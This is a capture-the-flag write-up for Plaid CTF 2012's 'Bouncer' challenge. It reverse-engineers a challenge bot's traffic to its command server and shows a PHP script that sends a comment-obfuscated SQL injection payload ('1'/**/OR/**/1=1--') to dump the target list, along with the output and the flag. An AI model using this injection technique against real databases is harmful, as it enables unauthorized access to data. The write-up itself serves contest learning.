01
May
2012

Plaid CTF 2012 – Bouncer

In a recent battle we took an enemy robot hostage and examined his operating system. During the examination we found a piece of robot malware that we don’t quite understand. Can you enumerate its targets?

We solved this challenge the pretty (sqli) and dirty (bruteforce) way.

First of all we started the malware with strace. This shows us several connections to the ip 174.129.48.200. We started a tcpdump to see what exactly was send. It showed us the following data:

  • Http request to http://174.129.48.200:33123/
    GET /?salt=DEADBEEF HTTP/1.1
    Host: 174.129.48.200:33123
    Accept: */*

    HTTP/1.0 200 OK
    Server: BaseHTTP/0.3 Python/2.6.6
    Date: Sat, 28 Apr 2012 21:37:37 GMT
    Content-type: text/plain

    1847
  • Http request to http://174.129.48.200:8412
    GET /?id=1337&hash=MzExNQ%3D%3D HTTP/1.1
    Host: 174.129.48.200:8412
    Accept: */*

    HTTP/1.0 200 OK
    Server: B0Tz R U$ 1.1
    Date: Sat, 28 Apr 2012 21:37:37 GMT
    Content-type: text/plain

    127.0.0.1
  • A connection to 127.0.0.1 UDP: 9999, sending hello

So what it does was:

  • Connecting to http://174.129.48.200:33123
  • Receive a number
  • Calculate a port number and connect to that port
  • Send a target id and calculated hash
  • Receive target
  • Send an evil UDP packet to the target

So, we had to find how the port number and hash were calculated. The port number can be calculated by multiplying the received number by 4 and add 1024 to it. The hash is a base64 encoding of the id XORed with 2.

So at this point we could try to find other targets. We started trying id’s and found one at id=0. We just let the brute force running while thinking about a better solution. Thinking about what the script probably was doing, it was accepting an id, looked it up in a database and replied with a target. We tried to use some SQL injection and finally came with id=”1337’/**/or/**/1– “.

Underneath script can be used to connect to the target and find the solution. After we found the solution the pretty way, we also saw that the brute force script also had found the solution on id=65536.

<?
if (count($argv) != 3)
	die("usage: {$argv[0]} <host> <input>\n");

list($prog, $host, $inp) = $argv;

$inpx = join(array_map(function($a) {
	return chr(ord($a) ^ 2);
}, str_split($inp)));

$port = (int)file_get_contents("http://{$host}:33123/?salt=DEADBEEF") * 4 + 1024;

echo file_get_contents(
	"http://{$host}:{$port}/?id=".urlencode($inp) .
	"&hash=".urlencode(base64_encode($inpx))
)."\n";
?>
$ php bounce.php ec2-23-20-211-9.compute-1.amazonaws.com "1'/**/OR/**/1=1--"
10.0.0.1
127.0.0.1
Pwning1$m0reFunWhenTargetsBounce
$ php bounce.php ec2-23-20-211-9.compute-1.amazonaws.com 65536
Pwning1$m0reFunWhenTargetsBounce

{One Response to “Plaid CTF 2012 – Bouncer”}

  1. Very fun challenge. Great job with the write up!

    lbzzie